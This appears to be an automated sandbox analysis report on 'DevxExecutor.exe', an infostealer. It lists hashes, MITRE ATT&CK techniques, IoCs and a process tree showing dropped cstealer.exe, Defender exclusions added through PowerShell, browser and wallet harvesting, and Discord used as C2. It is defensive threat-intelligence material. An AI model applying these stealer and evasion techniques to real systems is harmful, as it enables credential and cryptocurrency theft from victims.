6d5ba38a5e9bde7939ac5dcb8fdcb970701168064d30abcf518cf8d272a0f581

Resubmissions

09-05-2024 12:59

240509-p8d4fsdf27 10

09-05-2024 12:50

240509-p298badc26 10

09-05-2024 12:45

240509-py7b9aab8t 8

09-05-2024 12:25

240509-plr2sscb99 10

Analysis

max time kernel
16s
max time network
123s
platform
windows11-21h2_x64
resource
win11-20240508-en
resource tags

arch:x64arch:x86image:win11-20240508-enlocale:en-usos:windows11-21h2-x64system
submitted
09-05-2024 12:45

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

DevxExecutor.exe
Size

44.1MB
MD5

e4897ef7419e128b1f7473119ce0bd07
SHA1

5aad252412a5923438f30cb9c397731a9b020121
SHA256

6d5ba38a5e9bde7939ac5dcb8fdcb970701168064d30abcf518cf8d272a0f581
SHA512

db66ea2cb3f5f30934ab071e1dd2e7b41f6dc5c4be125f1d2d6aab627b3be8b6cf8fcbed517a414cdf037a068414b178176edba2e28de6419b65269e0abb162c
SSDEEP

786432:NCZkrrfdktmLX8t8lBBvUPlZIOPuOI64zlNWtVMoOIsuXzfVib4a9BWN:N4GlkcLMtUzilKUINzmtVkMfWo

Score

8^/10

discovery evasion execution pyinstaller spyware stealer upx

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
execution

PowerShell
T1059.001

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid process

5864 powershell.exe
6160 powershell.exe
6408 powershell.exe
5276 powershell.exe
6440 powershell.exe
Contacts a large (925) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
discovery

Network Service Discovery
T1046
Stops running service(s) 4 TTPs
evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

Executes dropped EXE 31 IoCs

Processes:

cstealer.execstealer.execstealer.execstealer.execstealer.execstealer.exemain.exemain.execstealer.execstealer.execstealer.execstealer.execstealer.execstealer.exeBuild.execstealer.execstealer.execstealer.execstealer.exehacn.exehacn.exebased.exebased.execstealer.execstealer.exes.execstealer.execstealer.exemain.exesvchost.exesetup.exe

pid	process
4072	cstealer.exe
2272	cstealer.exe
2896	cstealer.exe
2904	cstealer.exe
1956	cstealer.exe
3844	cstealer.exe
3512	main.exe
2948	main.exe
4352	cstealer.exe
1168	cstealer.exe
1624	cstealer.exe
3720	cstealer.exe
2360	cstealer.exe
900	cstealer.exe
4940	Build.exe
3624	cstealer.exe
400	cstealer.exe
3896	cstealer.exe
2236	cstealer.exe
3308	hacn.exe
3620	hacn.exe
1480	based.exe
3360	based.exe
5508	cstealer.exe
5812	cstealer.exe
6204	s.exe
6892	cstealer.exe
6692	cstealer.exe
5828	main.exe
4836	svchost.exe
7284	setup.exe

Loads dropped DLL 64 IoCs

Processes:

cstealer.execstealer.execstealer.exemain.execstealer.exe

pid	process
2272	cstealer.exe
2272	cstealer.exe
2272	cstealer.exe
2272	cstealer.exe
2272	cstealer.exe
2272	cstealer.exe
2272	cstealer.exe
2272	cstealer.exe
2272	cstealer.exe
2272	cstealer.exe
2272	cstealer.exe
2272	cstealer.exe
2272	cstealer.exe
2272	cstealer.exe
2272	cstealer.exe
2272	cstealer.exe
2272	cstealer.exe
2272	cstealer.exe
2272	cstealer.exe
2904	cstealer.exe
2904	cstealer.exe
2904	cstealer.exe
2904	cstealer.exe
2904	cstealer.exe
2904	cstealer.exe
2904	cstealer.exe
2904	cstealer.exe
2904	cstealer.exe
2904	cstealer.exe
2904	cstealer.exe
2904	cstealer.exe
2904	cstealer.exe
2904	cstealer.exe
2904	cstealer.exe
2904	cstealer.exe
2904	cstealer.exe
2904	cstealer.exe
3844	cstealer.exe
3844	cstealer.exe
3844	cstealer.exe
3844	cstealer.exe
3844	cstealer.exe
3844	cstealer.exe
3844	cstealer.exe
3844	cstealer.exe
3844	cstealer.exe
3844	cstealer.exe
3844	cstealer.exe
3844	cstealer.exe
3844	cstealer.exe
3844	cstealer.exe
3844	cstealer.exe
3844	cstealer.exe
3844	cstealer.exe
3844	cstealer.exe
2948	main.exe
2948	main.exe
1168	cstealer.exe
1168	cstealer.exe
1168	cstealer.exe
1168	cstealer.exe
1168	cstealer.exe
1168	cstealer.exe
1168	cstealer.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

UPX packed file 35 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
behavioral1/memory/2948-156-0x00007FFB21870000-0x00007FFB21E58000-memory.dmp	upx
behavioral1/memory/2948-221-0x00007FFB21870000-0x00007FFB21E58000-memory.dmp	upx
behavioral1/memory/3360-321-0x00007FFB1CFE0000-0x00007FFB1D5C8000-memory.dmp	upx
behavioral1/memory/3360-323-0x00007FFB1CF80000-0x00007FFB1CF8F000-memory.dmp	upx
behavioral1/memory/3360-322-0x00007FFB1CF90000-0x00007FFB1CFB4000-memory.dmp	upx
behavioral1/memory/3360-383-0x00007FFB1CC70000-0x00007FFB1CC89000-memory.dmp	upx
behavioral1/memory/3360-384-0x00007FFB1CC60000-0x00007FFB1CC6D000-memory.dmp	upx
behavioral1/memory/3360-385-0x00007FFB1CC30000-0x00007FFB1CC5E000-memory.dmp	upx
behavioral1/memory/3360-380-0x00007FFB1CC90000-0x00007FFB1CE03000-memory.dmp	upx
behavioral1/memory/3360-371-0x00007FFB1CE10000-0x00007FFB1CE33000-memory.dmp	upx
behavioral1/memory/3360-388-0x00007FFB1CB70000-0x00007FFB1CC28000-memory.dmp	upx
behavioral1/memory/3360-369-0x00007FFB1CE40000-0x00007FFB1CE59000-memory.dmp	upx
behavioral1/memory/3360-368-0x00007FFB1CE60000-0x00007FFB1CE8D000-memory.dmp	upx
behavioral1/memory/3360-390-0x00007FFB1C7F0000-0x00007FFB1CB65000-memory.dmp	upx
behavioral1/memory/3360-397-0x00007FFB1C7C0000-0x00007FFB1C7CD000-memory.dmp	upx
behavioral1/memory/3360-396-0x00007FFB1C7D0000-0x00007FFB1C7E4000-memory.dmp	upx
behavioral1/memory/3360-407-0x00007FFB1C6A0000-0x00007FFB1C7BC000-memory.dmp	upx
behavioral1/memory/3360-406-0x00007FFB1CFE0000-0x00007FFB1D5C8000-memory.dmp	upx
behavioral1/memory/3360-2300-0x00007FFB1CF90000-0x00007FFB1CFB4000-memory.dmp	upx
behavioral1/memory/3360-2554-0x00007FFB1CE10000-0x00007FFB1CE33000-memory.dmp	upx
behavioral1/memory/3360-2669-0x00007FFB1C7D0000-0x00007FFB1C7E4000-memory.dmp	upx
behavioral1/memory/3360-2660-0x00007FFB1CF80000-0x00007FFB1CF8F000-memory.dmp	upx
behavioral1/memory/3360-2674-0x00007FFB1C6A0000-0x00007FFB1C7BC000-memory.dmp	upx
behavioral1/memory/3360-2673-0x00007FFB1C7C0000-0x00007FFB1C7CD000-memory.dmp	upx
behavioral1/memory/3360-2672-0x00007FFB1CFE0000-0x00007FFB1D5C8000-memory.dmp	upx
behavioral1/memory/3360-2668-0x00007FFB1CB70000-0x00007FFB1CC28000-memory.dmp	upx
behavioral1/memory/3360-2667-0x00007FFB1CC30000-0x00007FFB1CC5E000-memory.dmp	upx
behavioral1/memory/3360-2666-0x00007FFB1CC60000-0x00007FFB1CC6D000-memory.dmp	upx
behavioral1/memory/3360-2665-0x00007FFB1CC70000-0x00007FFB1CC89000-memory.dmp	upx
behavioral1/memory/3360-2664-0x00007FFB1CC90000-0x00007FFB1CE03000-memory.dmp	upx
behavioral1/memory/3360-2663-0x00007FFB1CE10000-0x00007FFB1CE33000-memory.dmp	upx
behavioral1/memory/3360-2662-0x00007FFB1CE40000-0x00007FFB1CE59000-memory.dmp	upx
behavioral1/memory/3360-2661-0x00007FFB1CE60000-0x00007FFB1CE8D000-memory.dmp	upx
behavioral1/memory/3360-2659-0x00007FFB1CF90000-0x00007FFB1CFB4000-memory.dmp	upx
behavioral1/memory/3360-2658-0x00007FFB1C7F0000-0x00007FFB1CB65000-memory.dmp	upx

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Legitimate hosting services abused for malware hosting/C2 1 TTPs 10 IoCs

Web Service

T1102

Processes:

flow	ioc
87	raw.githubusercontent.com
147	discord.com
178	discord.com
9	discord.com
24	discord.com
38	raw.githubusercontent.com
40	raw.githubusercontent.com
74	discord.com
1	raw.githubusercontent.com
1	discord.com

Looks up external IP address via web service 3 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

24 api.ipify.org
25 ip-api.com
42 api.ipify.org
Launches sc.exe 10 IoCs
Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exe

pid process

14432 sc.exe
14492 sc.exe
6080 sc.exe
6164 sc.exe
14412 sc.exe
6448 sc.exe
1892 sc.exe
5500 sc.exe
8312 sc.exe
6452 sc.exe

flow	ioc
24	api.ipify.org
25	ip-api.com
42	api.ipify.org

pid	process
14432	sc.exe
14492	sc.exe
6080	sc.exe
6164	sc.exe
14412	sc.exe
6448	sc.exe
1892	sc.exe
5500	sc.exe
8312	sc.exe
6452	sc.exe

Detects Pyinstaller 4 IoCs

pyinstaller

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\cstealer.exe	pyinstaller
C:\Users\Admin\AppData\Local\Temp\main.exe	pyinstaller
C:\ProgramData\Microsoft\hacn.exe	pyinstaller
C:\ProgramData\svchost.exe	pyinstaller

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Checks processor information in registry 2 TTPs 6 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

firefox.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe

Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task/Job
T1053

Processes:

schtasks.exeschtasks.exe

pid process

7240 schtasks.exe
14676 schtasks.exe
Delays execution with timeout.exe 1 IoCs
evasion

Processes:

timeout.exe

pid process

8068 timeout.exe
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.

System Information Discovery
T1082

Processes:

WMIC.exe

pid process

6456 WMIC.exe
Enumerates processes with tasklist 1 TTPs 4 IoCs

Process Discovery
T1057

Processes:

tasklist.exetasklist.exetasklist.exetasklist.exe

pid process

5936 tasklist.exe
5900 tasklist.exe
7132 tasklist.exe
8172 tasklist.exe
Gathers system information 1 TTPs 1 IoCs
Runs systeminfo.exe.

System Information Discovery
T1082

Processes:

systeminfo.exe

pid process

6448 systeminfo.exe
Modifies registry class 1 IoCs

Processes:

firefox.exe

description ioc process

Key created \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings firefox.exe
Modifies registry key 1 TTPs 1 IoCs

Modify Registry
T1112

Processes:

reg.exe

pid process

944 reg.exe

pid	process
7240	schtasks.exe
14676	schtasks.exe

pid	process
8068	timeout.exe

pid	process
6456	WMIC.exe

pid	process
5936	tasklist.exe
5900	tasklist.exe
7132	tasklist.exe
8172	tasklist.exe

pid	process
6448	systeminfo.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings	firefox.exe

pid	process
944	reg.exe

Suspicious behavior: EnumeratesProcesses 15 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid	process
5864	powershell.exe
5864	powershell.exe
4948	powershell.exe
4948	powershell.exe
6160	powershell.exe
6160	powershell.exe
7056	powershell.exe
7056	powershell.exe
5864	powershell.exe
5864	powershell.exe
6440	powershell.exe
6440	powershell.exe
6160	powershell.exe
4948	powershell.exe
7056	powershell.exe

Suspicious use of AdjustPrivilegeToken 53 IoCs

Processes:

firefox.exetasklist.exetasklist.exepowershell.exepowershell.exepowershell.exeWMIC.exetasklist.exepowershell.exepowershell.exemain.exe

description	pid	process
Token: SeDebugPrivilege	1468	firefox.exe
Token: SeDebugPrivilege	1468	firefox.exe
Token: SeDebugPrivilege	5900	tasklist.exe
Token: SeDebugPrivilege	5936	tasklist.exe
Token: SeDebugPrivilege	5864	powershell.exe
Token: SeDebugPrivilege	4948	powershell.exe
Token: SeDebugPrivilege	6160	powershell.exe
Token: SeIncreaseQuotaPrivilege	7124	WMIC.exe
Token: SeSecurityPrivilege	7124	WMIC.exe
Token: SeTakeOwnershipPrivilege	7124	WMIC.exe
Token: SeLoadDriverPrivilege	7124	WMIC.exe
Token: SeSystemProfilePrivilege	7124	WMIC.exe
Token: SeSystemtimePrivilege	7124	WMIC.exe
Token: SeProfSingleProcessPrivilege	7124	WMIC.exe
Token: SeIncBasePriorityPrivilege	7124	WMIC.exe
Token: SeCreatePagefilePrivilege	7124	WMIC.exe
Token: SeBackupPrivilege	7124	WMIC.exe
Token: SeRestorePrivilege	7124	WMIC.exe
Token: SeShutdownPrivilege	7124	WMIC.exe
Token: SeDebugPrivilege	7124	WMIC.exe
Token: SeSystemEnvironmentPrivilege	7124	WMIC.exe
Token: SeRemoteShutdownPrivilege	7124	WMIC.exe
Token: SeUndockPrivilege	7124	WMIC.exe
Token: SeManageVolumePrivilege	7124	WMIC.exe
Token: 33	7124	WMIC.exe
Token: 34	7124	WMIC.exe
Token: 35	7124	WMIC.exe
Token: 36	7124	WMIC.exe
Token: SeDebugPrivilege	7132	tasklist.exe
Token: SeDebugPrivilege	7056	powershell.exe
Token: SeDebugPrivilege	6440	powershell.exe
Token: SeIncreaseQuotaPrivilege	7124	WMIC.exe
Token: SeSecurityPrivilege	7124	WMIC.exe
Token: SeTakeOwnershipPrivilege	7124	WMIC.exe
Token: SeLoadDriverPrivilege	7124	WMIC.exe
Token: SeSystemProfilePrivilege	7124	WMIC.exe
Token: SeSystemtimePrivilege	7124	WMIC.exe
Token: SeProfSingleProcessPrivilege	7124	WMIC.exe
Token: SeIncBasePriorityPrivilege	7124	WMIC.exe
Token: SeCreatePagefilePrivilege	7124	WMIC.exe
Token: SeBackupPrivilege	7124	WMIC.exe
Token: SeRestorePrivilege	7124	WMIC.exe
Token: SeShutdownPrivilege	7124	WMIC.exe
Token: SeDebugPrivilege	7124	WMIC.exe
Token: SeSystemEnvironmentPrivilege	7124	WMIC.exe
Token: SeRemoteShutdownPrivilege	7124	WMIC.exe
Token: SeUndockPrivilege	7124	WMIC.exe
Token: SeManageVolumePrivilege	7124	WMIC.exe
Token: 33	7124	WMIC.exe
Token: 34	7124	WMIC.exe
Token: 35	7124	WMIC.exe
Token: 36	7124	WMIC.exe
Token: SeDebugPrivilege	5828	main.exe

Suspicious use of FindShellTrayWindow 4 IoCs

Processes:

firefox.exe

pid process

1468 firefox.exe
1468 firefox.exe
1468 firefox.exe
1468 firefox.exe
Suspicious use of SendNotifyMessage 3 IoCs

Processes:

firefox.exe

pid process

1468 firefox.exe
1468 firefox.exe
1468 firefox.exe
Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

firefox.exe

pid process

1468 firefox.exe

pid	process
1468	firefox.exe
1468	firefox.exe
1468	firefox.exe
1468	firefox.exe

pid	process
1468	firefox.exe
1468	firefox.exe
1468	firefox.exe

pid	process
1468	firefox.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

DevxExecutor.execstealer.execstealer.execmd.execstealer.execstealer.execmd.execstealer.execstealer.exemain.execmd.execstealer.execstealer.execmd.execstealer.exemain.execmd.execstealer.execmd.execstealer.execmd.execstealer.execstealer.exefirefox.execmd.execstealer.exe

description	pid	process	target process
PID 2444 wrote to memory of 4072	2444	DevxExecutor.exe	cstealer.exe
PID 2444 wrote to memory of 4072	2444	DevxExecutor.exe	cstealer.exe
PID 4072 wrote to memory of 2272	4072	cstealer.exe	cstealer.exe
PID 4072 wrote to memory of 2272	4072	cstealer.exe	cstealer.exe
PID 2272 wrote to memory of 4452	2272	cstealer.exe	cmd.exe
PID 2272 wrote to memory of 4452	2272	cstealer.exe	cmd.exe
PID 4452 wrote to memory of 2896	4452	cmd.exe	cstealer.exe
PID 4452 wrote to memory of 2896	4452	cmd.exe	cstealer.exe
PID 2896 wrote to memory of 2904	2896	cstealer.exe	cstealer.exe
PID 2896 wrote to memory of 2904	2896	cstealer.exe	cstealer.exe
PID 2904 wrote to memory of 2216	2904	cstealer.exe	cmd.exe
PID 2904 wrote to memory of 2216	2904	cstealer.exe	cmd.exe
PID 2216 wrote to memory of 1956	2216	cmd.exe	cstealer.exe
PID 2216 wrote to memory of 1956	2216	cmd.exe	cstealer.exe
PID 1956 wrote to memory of 3844	1956	cstealer.exe	cstealer.exe
PID 1956 wrote to memory of 3844	1956	cstealer.exe	cstealer.exe
PID 2444 wrote to memory of 3512	2444	DevxExecutor.exe	main.exe
PID 2444 wrote to memory of 3512	2444	DevxExecutor.exe	main.exe
PID 3844 wrote to memory of 2844	3844	cstealer.exe	cmd.exe
PID 3844 wrote to memory of 2844	3844	cstealer.exe	cmd.exe
PID 3512 wrote to memory of 2948	3512	main.exe	main.exe
PID 3512 wrote to memory of 2948	3512	main.exe	main.exe
PID 2844 wrote to memory of 4352	2844	cmd.exe	cstealer.exe
PID 2844 wrote to memory of 4352	2844	cmd.exe	cstealer.exe
PID 4352 wrote to memory of 1168	4352	cstealer.exe	cstealer.exe
PID 4352 wrote to memory of 1168	4352	cstealer.exe	cstealer.exe
PID 1168 wrote to memory of 1076	1168	cstealer.exe	cmd.exe
PID 1168 wrote to memory of 1076	1168	cstealer.exe	cmd.exe
PID 1076 wrote to memory of 1624	1076	cmd.exe	cstealer.exe
PID 1076 wrote to memory of 1624	1076	cmd.exe	cstealer.exe
PID 1624 wrote to memory of 3720	1624	cstealer.exe	cstealer.exe
PID 1624 wrote to memory of 3720	1624	cstealer.exe	cstealer.exe
PID 2948 wrote to memory of 4760	2948	main.exe	cmd.exe
PID 2948 wrote to memory of 4760	2948	main.exe	cmd.exe
PID 4936 wrote to memory of 2360	4936	cmd.exe	cstealer.exe
PID 4936 wrote to memory of 2360	4936	cmd.exe	cstealer.exe
PID 2360 wrote to memory of 900	2360	cstealer.exe	cstealer.exe
PID 2360 wrote to memory of 900	2360	cstealer.exe	cstealer.exe
PID 4760 wrote to memory of 4940	4760	cmd.exe	Build.exe
PID 4760 wrote to memory of 4940	4760	cmd.exe	Build.exe
PID 4760 wrote to memory of 4940	4760	cmd.exe	Build.exe
PID 900 wrote to memory of 2124	900	cstealer.exe	cmd.exe
PID 900 wrote to memory of 2124	900	cstealer.exe	cmd.exe
PID 2124 wrote to memory of 3624	2124	cmd.exe	cstealer.exe
PID 2124 wrote to memory of 3624	2124	cmd.exe	cstealer.exe
PID 3624 wrote to memory of 400	3624	cstealer.exe	cstealer.exe
PID 3624 wrote to memory of 400	3624	cstealer.exe	cstealer.exe
PID 400 wrote to memory of 2312	400	cstealer.exe	cmd.exe
PID 400 wrote to memory of 2312	400	cstealer.exe	cmd.exe
PID 2752 wrote to memory of 1468	2752	firefox.exe	firefox.exe
PID 2752 wrote to memory of 1468	2752	firefox.exe	firefox.exe
PID 2752 wrote to memory of 1468	2752	firefox.exe	firefox.exe
PID 2752 wrote to memory of 1468	2752	firefox.exe	firefox.exe
PID 2752 wrote to memory of 1468	2752	firefox.exe	firefox.exe
PID 2752 wrote to memory of 1468	2752	firefox.exe	firefox.exe
PID 2752 wrote to memory of 1468	2752	firefox.exe	firefox.exe
PID 2752 wrote to memory of 1468	2752	firefox.exe	firefox.exe
PID 2752 wrote to memory of 1468	2752	firefox.exe	firefox.exe
PID 2752 wrote to memory of 1468	2752	firefox.exe	firefox.exe
PID 2752 wrote to memory of 1468	2752	firefox.exe	firefox.exe
PID 2312 wrote to memory of 3896	2312	cmd.exe	cstealer.exe
PID 2312 wrote to memory of 3896	2312	cmd.exe	cstealer.exe
PID 3896 wrote to memory of 2236	3896	cstealer.exe	cstealer.exe
PID 3896 wrote to memory of 2236	3896	cstealer.exe	cstealer.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\DevxExecutor.exe
"C:\Users\Admin\AppData\Local\Temp\DevxExecutor.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2444
- C:\Users\Admin\AppData\Local\Temp\cstealer.exe
  "C:\Users\Admin\AppData\Local\Temp\cstealer.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:4072
- - C:\Users\Admin\AppData\Local\Temp\cstealer.exe
    "C:\Users\Admin\AppData\Local\Temp\cstealer.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of WriteProcessMemory
    PID:2272
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:4452
    - - C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        5⤵
        Executes dropped EXE
        Suspicious use of WriteProcessMemory
        
        PID:2896
      - C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of WriteProcessMemory
        
        PID:2904
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet"
        7⤵
        Suspicious use of WriteProcessMemory
        
        PID:2216
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        8⤵
        Executes dropped EXE
        Suspicious use of WriteProcessMemory
        
        PID:1956
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        9⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of WriteProcessMemory
        
        PID:3844
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet"
        10⤵
        Suspicious use of WriteProcessMemory
        
        PID:2844
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        11⤵
        Executes dropped EXE
        Suspicious use of WriteProcessMemory
        
        PID:4352
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        12⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of WriteProcessMemory
        
        PID:1168
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet"
        13⤵
        Suspicious use of WriteProcessMemory
        
        PID:1076
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        14⤵
        Executes dropped EXE
        Suspicious use of WriteProcessMemory
        
        PID:1624
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        15⤵
        Executes dropped EXE
        
        PID:3720
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet"
        16⤵
        Suspicious use of WriteProcessMemory
        
        PID:4936
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        17⤵
        Executes dropped EXE
        Suspicious use of WriteProcessMemory
        
        PID:2360
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        18⤵
        Executes dropped EXE
        Suspicious use of WriteProcessMemory
        
        PID:900
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet"
        19⤵
        Suspicious use of WriteProcessMemory
        
        PID:2124
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        20⤵
        Executes dropped EXE
        Suspicious use of WriteProcessMemory
        
        PID:3624
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        21⤵
        Executes dropped EXE
        Suspicious use of WriteProcessMemory
        
        PID:400
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet"
        22⤵
        Suspicious use of WriteProcessMemory
        
        PID:2312
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        23⤵
        Executes dropped EXE
        Suspicious use of WriteProcessMemory
        
        PID:3896
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        24⤵
        Executes dropped EXE
        
        PID:2236
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet"
        25⤵
        
        PID:4256
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        26⤵
        Executes dropped EXE
        
        PID:5508
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        27⤵
        Executes dropped EXE
        
        PID:5812
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet"
        28⤵
        
        PID:6856
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        29⤵
        Executes dropped EXE
        
        PID:6892
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        30⤵
        Executes dropped EXE
        
        PID:6692
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet"
        31⤵
        
        PID:7352
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        32⤵
        
        PID:7600
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        33⤵
        
        PID:7744
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet"
        34⤵
        
        PID:7684
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        35⤵
        
        PID:792
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        36⤵
        
        PID:7092
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet"
        37⤵
        
        PID:6896
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        38⤵
        
        PID:7720
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
